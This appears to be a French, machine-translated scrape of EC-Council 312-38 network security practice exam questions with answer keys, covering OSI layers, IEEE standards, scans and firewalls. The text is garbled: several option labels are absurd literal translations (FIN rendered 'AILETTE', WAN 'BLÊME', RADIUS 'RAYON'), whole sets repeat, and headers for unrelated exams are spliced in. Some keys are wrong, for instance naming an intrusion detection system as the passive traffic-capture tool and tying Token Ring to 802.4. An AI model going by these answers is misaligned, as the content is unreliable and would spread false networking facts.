Vous êtes sur la page 1sur 70

05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

EC Council 312-38 Ensemble d'examen d'administrateur de


sécurité réseau (ENSA) 1-9

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité


réseau (ENSA) 1
Lequel des drapeaux suivants est défini lorsqu'un port fermé répond à une analyse d'arbre de Noël?

• RST
• AILETTE
• POUSSER
• ACK

Réponse: RST

Token Ring est normalisé par laquelle des normes IEEE suivantes?

• 802.4
• 802.2
• 802.1
• 802.3

Réponse: 802.4
Lequel des éléments suivants est un réseau haute vitesse qui connecte des ordinateurs, des imprimantes et
d'autres périphériques réseau?
• BLÊME
• LAN
• POUVEZ
• HOMME
Réponse: LAN

Laquelle des options suivantes n'est PAS une méthode d'authentification WEP?

• Authentification du système ouvert


• Authentification d'accès aux médias
• Authentification Kerberos
• Authentification par clé partagée

Réponse: authentification Kerberos

Laquelle des normes IEEE suivantes définit la topologie en anneau passant par jeton?
• 802.4
• 802.3
• 802.5
• 802,7

Réponse: 802.5

Laquelle des couches suivantes est la plus proche de l'utilisateur final?


• Couche d'application
• Couche de présentation
• Couche physique
• Couche de session

Réponse: couche d'application

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

John travaille en tant que pirate éthique pour www.company.com Inc. Il souhaite découvrir les ports
ouverts sur le serveur de www.company.com à l'aide d'un scanner de ports. Cependant, il ne souhaite pas
établir une connexion TCP complète. Laquelle des techniques de numérisation suivantes utilisera-t-il pour
accomplir cette tâche?
• TCP SYN / ACK
• TCP SYN
• TCP FIN
• arbre de Noël

Réponse: TCP SYN


Quelle est la réponse d'un scan de Noël si un port est ouvert ou filtré?
• RST
• AILETTE
• POUSSER
• Pas de réponse

Réponse: pas de réponse


Dans lequel des modes de transmission suivants la communication est-elle unidirectionnelle ?
• Mode duplex intégral
• Mode racine
• Mode simplex
• Mode semi-duplex

Réponse: mode simplex


Laquelle des normes IEEE suivantes ajoute des fonctionnalités QoS et une prise en charge multimédia?
• 802.11b
• 802.11a
• 802,5
• 802.11e

Réponse: 802.11e
Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?
• Crossover
• Parallèle
• Loopback
• En série

Réponse: Crossover

Laquelle des normes IEEE suivantes définit une topologie de bus physique?
• 802,5
• 802,6
• 802.3
• 802.4

Réponse: 802.4
Laquelle des transitions d'état TCP / IP suivantes ne représente aucun état de connexion?

• Fermeture
• Fermer-attendre
• Fermé
• Fin-attente-1

Réponse: fermé

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour capturer le trafic
réseau?
• Renifleur
• Système de prévention des intrusions
• Warchalking
• Système de détection d'intrusion

Réponse: Système de détection d'intrusion


Laquelle des normes suivantes est approuvée par IEEE-SA pour les réseaux personnels sans fil?
• 802.16
• 802.15
• 802.1
• 802.11a

Réponse: 802.15

CSMA / CD est spécifié dans laquelle des normes IEEE suivantes?


• 802.2
• 802.1
• 802.3
• 802.15

Réponse: 802.3
Lequel des éléments suivants est un protocole de couche réseau utilisé pour obtenir une adresse IP pour une
adresse matérielle (MAC) donnée?
• IP
• ARP
• PIM
• RARP

Réponse: RARP

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
• Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet.
• Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.
• La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé.
• Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.
Les adresses IP réservées à des fins expérimentales appartiennent à laquelle des classes suivantes?
• Classe E
• Classe D
• Classe C
• Classe A

Réponse: Classe E

Lequel des éléments suivants est un appareil électronique qui aide à transmettre des paquets de données le
long des réseaux?
• Centre Routeur passerelle Répétiteur
Réponse: Routeur

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des protocoles suivants est utilisé dans les réseaux sans fil?
CSMA / CD

ALOHA

CSMA

CSMA / CA

Réponse: CSMA / CA

Lequel des champs suivants dans l'en-tête IPv6 remplace le champ TTL dans l'en-tête IPv4?
En-tête suivant

Version

Classe de trafic

Limite de saut (correcte)

Réponse: limite de saut

Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaines?

VoIP

RPC

BGP

RAYON

Réponse: BGP

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse réseau de
classe A?
224-255

0-127

128-191

192-223

Réponse: 0-127
Laquelle des couches OSI suivantes est parfois appelée couche de syntaxe?

Couche de liaison de données

Couche d'application

Couche de présentation Couche

physique

Réponse: couche de présentation

Lequel des outils suivants est un analyseur de protocole open source qui peut capturer le trafic en temps
réel?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Renifler

Netresident

NetWitness

Wireshark

Réponse: Wireshark

Laquelle des couches OSI suivantes formate et chiffre les données à envoyer sur le réseau?

Couche physique

Couche de présentation Couche

réseau

Couche de transport

Réponse: couche de présentation


Laquelle des couches suivantes assure la gestion des sessions de communication entre les ordinateurs hôtes?

Couche de lien

Couche d'application

Couche Internet

Couche de transport (correcte)

Réponse: couche de transport

Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et promouvoir
les normes de sécurité Internet?
IEEE

ANSI

WASC

UIT

Réponse: WASC
Laquelle des couches suivantes du modèle OSI fournit l'adressage physique?
Couche de liaison de données Couche

d'application

Couche physique

Couche réseau

Réponse: couche de liaison de données

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-1 1/9
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

ECCouncil 312-38 Ensemble d'examen d'administrateur de


sécurité réseau (ENSA) 2
Vous travaillez en tant qu'analyseur de sécurité réseau. Vous avez reçu un e-mail suspect en
travaillant sur un projet médico-légal. Maintenant, vous voulez connaître l'adresse IP de
l'expéditeur afin d'analyser diverses informations telles que l'emplacement réel, les
informations de domaine, le système d'exploitation utilisé, les coordonnées, etc. de l'expéditeur
de l'e-mail à l'aide de divers outils et ressources . Vous souhaitez également vérifier si cet e-
mail est faux ou réel. Vous savez que l'analyse des en-têtes de courrier électronique est un bon
point de départ dans de tels cas. L'en-tête de l'e-mail suspect est indiqué ci-dessous: Quelle est
l'adresse IP de l'expéditeur de cet e-mail?
209.191.91.180

172.16.10.90

141.1.1.1

216.168.54.25

Réponse: 216.168.54.25

ECCouncil EC1-349 Computer Hack Forensic Investigator Exam Set 3


Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un
contenu commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.
Brouillage des e-mails
Usurpation d'adresse e-mail
Courrier indésirable
Spam par e-mail

Réponse: Courrier indésirable Courriel indésirable


Lequel des systèmes suivants surveille le système d'exploitation en détectant une activité
inappropriée, en écrivant dans des fichiers journaux et en déclenchant des alarmes?
Système d'identification basé sur les signatures

Système d'identification basé sur l'hôte Système

d'identification basé sur le réseau

Système d'identification basé sur le comportement

Réponse: système d'identification basé sur l'hôte

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 7/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des éléments suivants est un exemple de réseau fournissant des méthodes d'accès
DQDB?

IEEE 802.2

IEEE 802.4

IEEE 802.3

IEEE 802.6

Réponse: IEEE 802.6


Lequel des outils d'analyse réseau suivants est un analyseur de port TCP / UDP qui fonctionne
comme un balayeur de ping et un résolveur de nom d'hôte?
Hping

Netstat

SuperScan

Nmap

Réponse: SuperScan

Lequel des éléments suivants est un mécanisme de contrôle de congestion conçu pour les flux
de monodiffusion fonctionnant dans un environnement Internet et concurrençant le trafic
TCP?
Fenêtre coulissante

Augmentation additive / diminution multiplicative

Reconnaissance sélective

Contrôle de débit amical TCP

Réponse: TCP Friendly Rate Control

Lequel des protocoles suivants est une méthode pour implémenter des réseaux privés virtuels?

PPTP

TLS

SNMP

SSL

Réponse: PPTP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 8/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des éléments suivants est un produit Cisco qui exécute des fonctions VPN et pare-feu?
Pare-feu PIX Passerelle au

niveau du circuit Pare-feu de

filtrage de paquets IP

Pare-feu au niveau de l'application

Réponse: Pare-feu PIX

Dans lequel des modes de transmission suivants les données sont-elles envoyées et reçues
alternativement?
Mode pont

Mode semi-duplex
Mode duplex intégral

Mode simplex

Réponse: mode semi-duplex

Laquelle des couches OSI suivantes définit les spécifications électriques et physiques des
appareils?
Couche de transport Couche

de présentation Couche de

liaison de données

Couche physique (correcte)

Réponse: couche physique

Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et
promouvoir les normes de sécurité Internet?
UIT

ANSI

WASC

IEEE

Réponse: WASC

Quelle est la portée des ports bien connus?


Au-dessus de 65535

0 à 1023

49152 à 65535

1024 à 49151

Réponse: 0 à 1023
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 9/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Parmi les outils suivants, lesquels ne sont PAS utilisés pour consigner les activités réseau dans
le système d'exploitation Linux? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.
Timbersee

Swatch

PsGetSid

PsLoggedOn

Réponse: PsGetSid PsLoggedOn


Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe B?
128-191

0-127

224-255

192-223

Réponse: 128-191
Laquelle des fonctionnalités clés suivantes limite le taux de transfert des données par un
expéditeur pour garantir une livraison fiable?
Transfert de données sans erreur

Contrôle de flux Contrôle de la

congestion

Transfert de données commandé

Réponse: Contrôle de flux

Combien de couches sont présentes dans le modèle de couche OSI?


4

Réponse: 7
Lequel des éléments suivants aide à bloquer tout le trafic entrant et / ou sortant non autorisé?

Pare-feu IDS

IPS

Renifleur

Réponse: pare - feu


https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 10
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des protocoles suivants est utilisé pour le routage des conversations vocales sur
Internet?
DHCP

DNS

IP

VoIP

Réponse: VoIP

Lequel des protocoles suivants prend en charge la multidiffusion spécifique à la source


(SSM)?
DHCP
DNS

ARP

BGMP

Réponse: BGMP
Lequel des protocoles suivants envoie un signal de bourrage lorsqu'une collision est détectée?

CSMA / CD CSMA

ALOHA

CSMA / CA

Réponse: CSMA / CD
Laquelle des normes IEEE suivantes définit la méthode d'accès prioritaire à la demande?

802.3

802.15

802.12

802.11

Réponse: 802.12

Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?
RG-58

RG-8

RG-62

RG-59

Réponse: RG-59

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 11
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Laquelle des options suivantes n'est PAS une méthode d'authentification WEP?

Authentification du système ouvert

Authentification d'accès aux médias

Authentification Kerberos

Authentification par clé partagée

Réponse: authentification Kerberos


Laquelle des normes IEEE suivantes définit la topologie en anneau passant par jeton?

802.4

802.3

802.5

802,7

Réponse: 802.5

Laquelle des couches suivantes est la plus proche de l'utilisateur final?

Couche d'application

Couche de présentation

Couche physique

Couche de session

Réponse: couche d'application


John travaille en tant que pirate éthique pour www.company.com Inc. Il souhaite découvrir les ports
ouverts sur le serveur de www.company.com à l'aide d'un scanner de ports. Cependant, il ne souhaite pas
établir une connexion TCP complète. Laquelle des techniques de numérisation suivantes utilisera-t-il pour
accomplir cette tâche?

TCP SYN / ACK

TCP SYN TCP

FIN

arbre de Noël

Réponse: TCP SYN

Quelle est la réponse d'un scan de Noël si un port est ouvert ou filtré?

RST

AILETTE

POUSSER

Pas de réponse

Réponse: pas de réponse

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 12
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

Dans lequel des modes de transmission suivants la communication est-elle unidirectionnelle?

Mode duplex intégral

Mode racine

Mode simplex Mode

semi-duplex

Réponse: mode simplex

Laquelle des normes IEEE suivantes ajoute des fonctionnalités QoS et une prise en charge multimédia?

802.11b

802.11a

802,5

802.11e

Réponse: 802.11e

Dans un réseau Ethernet poste à poste, lequel des câbles suivants est utilisé pour connecter deux
ordinateurs, à l'aide de connecteurs RJ-45 et d'un câble UTP de catégorie 5?
Crossover

Parallèle

Loopback
En série

Réponse: Crossover

Laquelle des normes IEEE suivantes définit une topologie de bus physique?

802,5

802,6

802.3

802.4

Réponse: 802.4
Laquelle des transitions d'état TCP / IP suivantes ne représente aucun état de connexion?

Fermeture

Fermer-attendre

Fermé

Fin-attente-1

Réponse: fermé

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 13
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour capturer le trafic
réseau?
Renifleur

Système de prévention des intrusions

Warchalking

Système de détection d'intrusion

Réponse: Système de détection d'intrusion


Laquelle des normes suivantes est approuvée par IEEE-SA pour les réseaux personnels sans fil?

802.16

802.15

802.1

802.11a

Réponse: 802.15

CSMA / CD est spécifié dans laquelle des normes IEEE suivantes?

802.2

802.1

802.3

802.15

Réponse: 802.3

Lequel des éléments suivants est un protocole de couche réseau utilisé pour obtenir une adresse IP pour une
adresse matérielle (MAC) donnée?
IP

ARP

PIM

RARP

Réponse: RARP

Parmi les affirmations suivantes, lesquelles sont VRAIES concernant la zone démilitarisée (DMZ)? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu connecté à un réseau
public comme Internet.

Les hôtes de la DMZ ont une connectivité complète avec des hôtes spécifiques du réseau interne.

La zone démilitarisée est un sous-réseau physique ou logique qui contient et expose les services externes d'une
organisation à un plus grand réseau non approuvé.

Le but d'une zone démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une
organisation.

Réponse: Dans une configuration DMZ, la plupart des ordinateurs du LAN fonctionnent derrière un pare-feu
connecté à un réseau public comme Internet. La zone démilitarisée est un sous-réseau physique ou logique qui contient
et expose les services externes d'une organisation à un plus grand réseau non approuvé. Le but d'une zone
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 14
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
démilitarisée est d'ajouter une couche de sécurité supplémentaire au réseau local d'une organisation.
Les adresses IP réservées à des fins expérimentales appartiennent à laquelle des classes suivantes?

Classe E

Classe D

Classe C

Classe A

Réponse: Classe E

Lequel des éléments suivants est un appareil électronique qui aide à transmettre des paquets de données le
long des réseaux?

Centre

Routeur

passerelle

Répétiteur

Réponse: Routeur
Lequel des protocoles suivants est utilisé dans les réseaux sans fil?

CSMA / CD

ALOHA

CSMA

CSMA / CA

Réponse: CSMA / CA

Lequel des champs suivants dans l'en-tête IPv6 remplace le champ TTL dans l'en-tête IPv4?

En-tête suivant

Version

Classe de trafic

Limite de saut (correcte)

Réponse: limite de saut


Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaines?

VoIP

RPC

BGP

RAYON

Réponse: BGP

Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse réseau de
classe A?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 15
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1

224-255

0-127

128-191

192-223

Réponse: 0-127
Laquelle des couches OSI suivantes est parfois appelée couche de syntaxe?

Couche de liaison de données

Couche d'application

Couche de présentation Couche

physique

Réponse: couche de présentation


Lequel des outils suivants est un analyseur de protocole open source qui peut capturer le trafic en temps
réel?
Renifler

Netresident

NetWitness

Wireshark

Réponse: Wireshark

Laquelle des couches OSI suivantes formate et chiffre les données à envoyer sur le réseau?

Couche physique

Couche de présentation Couche

réseau

Couche de transport

Réponse: couche de présentation


Laquelle des couches suivantes assure la gestion des sessions de communication entre les ordinateurs hôtes?

Couche de lien

Couche d'application

Couche Internet

Couche de transport (correcte)

Réponse: couche de transport

Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et promouvoir
les normes de sécurité Internet?
IEEE

ANSI

WASC

UIT
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 16
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 1
Réponse: WASC
Laquelle des couches suivantes du modèle OSI fournit l'adressage physique?
Couche de liaison de données Couche

d'application

Couche physique

Couche réseau

Réponse: couche de liaison de données

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 17
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

ECCouncil 312-38 Ensemble d'examen d'administrateur de


sécurité réseau (ENSA) 2
Vous travaillez en tant qu'analyseur de sécurité réseau. Vous avez reçu un e-mail suspect en
travaillant sur un projet médico-légal. Maintenant, vous voulez connaître l'adresse IP de
l'expéditeur afin d'analyser diverses informations telles que l'emplacement réel, les
informations de domaine, le système d'exploitation utilisé, les coordonnées, etc. de l'expéditeur
de l'e-mail à l'aide de divers outils et ressources . Vous souhaitez également vérifier si cet e-
mail est faux ou réel. Vous savez que l'analyse des en-têtes de courrier électronique est un bon
point de départ dans de tels cas. L'en-tête de l'e-mail suspect est indiqué ci-dessous: Quelle est
l'adresse IP de l'expéditeur de cet e-mail?

209.191.91.180

172.16.10.90

141.1.1.1

216.168.54.25

Réponse: 216.168.54.25

Laquelle des pratiques suivantes consiste à envoyer des e-mails indésirables, souvent avec un
contenu commercial, en grande quantité à un ensemble de destinataires aveugles? Chaque
bonne réponse représente une solution complète. Choisissez tout ce qui correspond.

Brouillage des e-mails

Usurpation d'adresse e-mail

Courrier indésirable

Spam par e-mail

Réponse: Courrier indésirable Courriel indésirable


Lequel des systèmes suivants surveille le système d'exploitation en détectant une activité
inappropriée, en écrivant dans des fichiers journaux et en déclenchant des alarmes?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 1/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Système d'identification basé sur les signatures

Système d'identification basé sur l'hôte Système

d'identification basé sur le réseau

Système d'identification basé sur le comportement

Réponse: système d'identification basé sur l'hôte

Lequel des éléments suivants est un exemple de réseau fournissant des méthodes d'accès
DQDB?
IEEE 802.2

IEEE 802.4

IEEE 802.3

IEEE 802.6

Réponse: IEEE 802.6

Lequel des outils d'analyse réseau suivants est un analyseur de port TCP / UDP qui fonctionne
comme un balayeur de ping et un résolveur de nom d'hôte?
Hping Netstat SuperScan Nmap

Réponse: SuperScan

Lequel des éléments suivants est un mécanisme de contrôle de congestion conçu pour les flux
de monodiffusion fonctionnant dans un environnement Internet et concurrençant le trafic
TCP?
Fenêtre coulissante

Augmentation additive / diminution multiplicative

Reconnaissance sélective

Contrôle de débit amical TCP

Réponse: TCP Friendly Rate Control

Lequel des protocoles suivants est une méthode pour implémenter des réseaux privés virtuels?

PPTP TLS

SNMP

SSL

Réponse: PPTP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 19
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2
Lequel des éléments suivants est un produit Cisco qui exécute des fonctions VPN et pare-feu?

Pare-feu PIX Passerelle au

niveau du circuit Pare-feu de

filtrage de paquets IP

Pare-feu au niveau de l'application

Réponse: Pare-feu PIX

Dans lequel des modes de transmission suivants les données sont-elles envoyées et reçues
alternativement?
Mode pont

Mode semi-duplex
Mode duplex intégral

Mode simplex

Réponse: mode semi-duplex

Laquelle des couches OSI suivantes définit les spécifications électriques et physiques des
appareils?
Couche de transport

Couche de présentation

Couche de liaison de données

Couche physique

Réponse: couche physique

Laquelle des organisations suivantes est une organisation mondiale qui vise à établir, affiner et
promouvoir les normes de sécurité Internet?
UIT

ANSI

WASC

IEEE

Réponse: WASC

Quelle est la portée des ports bien connus?


Au-dessus de 65535

0 à 1023

49152 à 65535

1024 à 49151

Réponse: 0 à 1023
https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 20
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2

Parmi les outils suivants, lesquels ne sont PAS utilisés pour consigner les activités réseau dans
le système d'exploitation Linux? Chaque bonne réponse représente une solution
complète. Choisissez tout ce qui correspond.

Timbersee

Swatch

PsGetSid

PsLoggedOn

Réponse: PsGetSid PsLoggedOn


Laquelle des plages d'adresses suivantes peut être utilisée dans le premier octet d'une adresse
réseau de classe B?
128-191

0-127

224-255

192-223

Réponse: 128-191
Laquelle des fonctionnalités clés suivantes limite le taux de transfert des données par un
expéditeur pour garantir une livraison fiable?
Transfert de données sans erreur

Contrôle de flux

Contrôle de la congestion

Transfert de données commandé

Réponse: Contrôle de flux

Combien de couches sont présentes dans le modèle de couche OSI?


4

Réponse: 7

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 21
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2
Lequel des éléments suivants aide à bloquer tout le trafic entrant et / ou sortant non autorisé?

Pare-feu

IDS

IPS

Renifleur

Réponse: pare - feu


Lequel des protocoles suivants est utilisé pour le routage des conversations vocales sur
Internet?

DHCP

DNS

IP

VoIP

Réponse: VoIP

Lequel des protocoles suivants prend en charge la multidiffusion spécifique à la source


(SSM)?
DHCP
DNS

ARP

BGMP

Réponse: BGMP

Lequel des protocoles suivants envoie un signal de bourrage lorsqu'une collision est détectée?

CSMA / CD

CSMA

ALOHA

CSMA / CA

Réponse: CSMA / CD
Laquelle des normes IEEE suivantes définit la méthode d'accès prioritaire à la demande?

802.3

802.15

802.12

802.11

Réponse: 802.12

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 22
/7
05/02/2020 ECCouncil 312-38 Ensemble d'examen d'administrateur de sécurité réseau (ENSA) 2
Lequel des types de câbles coaxiaux suivants est utilisé pour la télévision par câble et les
modems câble?
RG-58

RG-8

RG-62

RG-59

Réponse: RG-59

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 23
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

ECCouncil 312-38 Administrateur de la sécurité des réseaux


(ENSA) Set d'examen 3
Lequel des modes de configuration de routeur suivants modifie temporairement les
paramètres du terminal, effectue des tests de base et répertorie les informations système?

Utilisateur EXEC

EXEC privilégié

Configuration globale

Configuration de l'interface

Réponse: Utilisateur EXEC

Lequel des éléments suivants est un protocole d'application Internet utilisé pour transporter
les articles de presse Usenet entre les serveurs de nouvelles et pour lire et publier des articles
par les applications clientes des utilisateurs finaux?

BOOTP

DCAP

NNTP

NTP

Réponse: NNTP
Laquelle des techniques suivantes permet de collecter des informations sur un réseau distant
protégé par un pare-feu?

Warchalking

Numérotation de guerre

Firewalking

Conduite de guerre

Réponse: Firewalking

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 24
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3
Lequel des organismes suivants est le principal organisme international chargé de promouvoir
des normes coopératives pour les équipements et systèmes de télécommunications?

CCITT

IEEE

JE PEUX

NIST

Réponse: CCITT

ECCouncil E-Commerce Architect EC0-232 Practice Exam Set 8


Lequel des éléments suivants est un protocole de communication qui multidiffuse des
messages et des informations entre tous les appareils membres d'un groupe de multidiffusion
IP?
BGP

EGP

IGMP

ICMP

Réponse: IGMP

Lequel des câbles UTP suivants utilise quatre paires de câbles torsadés et fournit des vitesses
de transmission allant jusqu'à 16 Mbps?

Catégorie 5e

Catégorie 6

Catégorie 5

Catégorie 3

Réponse: Catégorie 3
Lequel des protocoles suivants est utilisé pour le routage multidiffusion inter-domaine et
prend en charge nativement la «multidiffusion spécifique à la source» (SSM)?

EIGRP

BGMP OSPF

DVMRP

Réponse: BGMP

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 25
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3
Lequel des protocoles suivants est utilisé par le protocole client / serveur RADIUS (Remote
Authentication Dial In User Service) pour la transmission de données?

FCP

DCCP

FTP

UDP

Réponse: UDP
Lequel des éléments suivants est un champ 16 bits qui identifie le numéro de port source du
programme d'application dans l'hôte qui envoie le segment?

Numéro d'accusé de réception

Longueur d'en-tête

Numéro de séquence

Adresse du port source (correcte)

Réponse: Adresse du port source

Lequel des éléments suivants est un protocole de passerelle extérieure qui communique à l'aide
d'un protocole TCP (Transmission Control Protocol) et envoie les informations de table de
routeur mises à jour?
BGP

IRDP

IGMP

OSPF

Réponse: BGP

Lequel des éléments suivants est un réseau téléphonique / de télécommunications numérique


qui achemine la voix, les données et la vidéo sur une infrastructure de réseau téléphonique
existante?
PPP

X.25

RNIS

Relais de trame

Réponse: RNIS

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 26
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3
Lequel des outils suivants examine un système pour un certain nombre de faiblesses connues
et alerte l'administrateur?

Nessus

SAINT

COPS

SATAN

Réponse: COPS

Il s'agit d'un outil basé sur Windows qui est utilisé pour la détection des réseaux locaux sans
fil à l'aide des normes IEEE 802.11a, 802.11b et 802.11g. Les principales caractéristiques de
ces outils sont les suivantes: il affiche la puissance du signal d'un réseau sans fil, l'adresse
MAC, le SSID, les détails du canal, etc. Il est couramment utilisé aux fins suivantes: a.
Conduite de guerre b. Détection des points d'accès non autorisés c .Détection des causes
d'interférence sur un WLAN d. Suivi des erreurs ICV WEP e. Création de graphiques et
d'alarmes sur les données 802.11, y compris la force du signal Cet outil est connu sous le nom
de .

Kismet

Absinthe

NetStumbler

THC-Scan

Réponse: NetStumbler

Lequel des appareils suivants aide à connecter un PC à un FAI via un PSTN?

Répétiteur

Carte PCI

Adaptateur

Modem

Réponse: Modem
Lequel des éléments suivants est un appareil qui reçoit un signal numérique sur un support de
transmission électromagnétique ou optique et régénère le signal le long de la jambe suivante
du support?

https://chercher.tech/hacking-certification/eccouncil-312-38-network-security-administrator-ensa-exam-test-set-2 27
/7
05/02/2020 ECCouncil 312-38 Administrateur de la sécurité des réseaux (ENSA) Set d'examen 3

Adaptateur de réseau

passerelle

Émetteur-récepteur

Répéteur

Réponse: répéteur

Lesquelles des étapes suivantes sont valides pour sécuriser les routeurs? Chaque bonne
réponse représente une solution complète. Choisissez tout ce qui correspond.
Configurez les entrées de la liste d'accès pour empêcher les connexions non autorisées et
l'acheminement du trafic.

Utilisez un mot de passe facile à retenir pour la console d'administration d'un routeur.

Utilisez un mot de passe complexe pour la console d'administration d'un routeur. Gardez

les routeurs à jour avec les derniers correctifs de sécurité.

Réponse: Configurez les entrées de la liste d'accès pour empêcher les connexions non autorisées
et le routage du trafic. Utilisez un mot de passe complexe pour la console d'administration d'un
routeur. Gardez les routeurs à jour avec les derniers correctifs de sécurité.

Lequel des éléments suivants est un outil logiciel utilisé dans les attaques passives pour
capturer le trafic réseau?
Système de détection d'intrusion

Warchalking

Sniffe

Système de prévention des intrusions

